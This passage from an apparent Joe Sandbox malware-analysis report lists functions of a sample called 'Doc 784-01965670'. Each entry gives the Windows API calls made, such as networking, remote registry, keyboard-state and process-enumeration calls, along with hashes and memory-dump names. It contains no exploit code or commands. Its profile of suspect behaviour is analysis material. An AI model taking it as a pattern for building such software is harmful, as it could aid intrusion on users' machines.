                                                                                                                                    • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                                    Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
                                                                                                                                      • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                    • inet_addr.WSOCK32(?), ref: 00464B1F
                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 00464B29
                                                                                                                                    • _memset.LIBCMT ref: 00464B92
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                                    • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3424476444-0
                                                                                                                                    • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                    • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                                    • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                    • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                                    Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                    • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                    • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                                    • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                    • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                                    Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 535477410-0
                                                                                                                                    • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                    • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                                    • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                    • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                                    Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • _memset.LIBCMT ref: 004538C4
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                                    • _wcslen.LIBCMT ref: 00453960
                                                                                                                                    • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 3530711334-4108050209
                                                                                                                                    • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                                    • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                                    • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                                    • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                                    Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 3488606520-2761332787
                                                                                                                                    • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                    • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                                    • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                    • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                                    Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4082120231-0
                                                                                                                                    • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                    • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                    • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                    • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                    Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4082120231-0
                                                                                                                                    • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                    • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                                    • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                    • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                                    Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 288456094-0
                                                                                                                                    • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                    • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                                    • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                    • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                                    Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 004449B0
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                    • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                                    • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                    • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                                    Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 00444BA9
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                    • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                                    • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                    • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                                    Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                    • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                                    • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                    • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                                    Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 535477410-2761332787
                                                                                                                                    • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                    • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                                    • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                    • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                                    Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00457C34
                                                                                                                                    • _memset.LIBCMT ref: 00457CE8
                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                    • String ID: <$@
                                                                                                                                    • API String ID: 1325244542-1426351568
                                                                                                                                    • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                                                                    • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                                    • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                                                                    • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                                    Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                                    • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                    • _wcscat.LIBCMT ref: 004737F6
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                                    Memory Dump Source
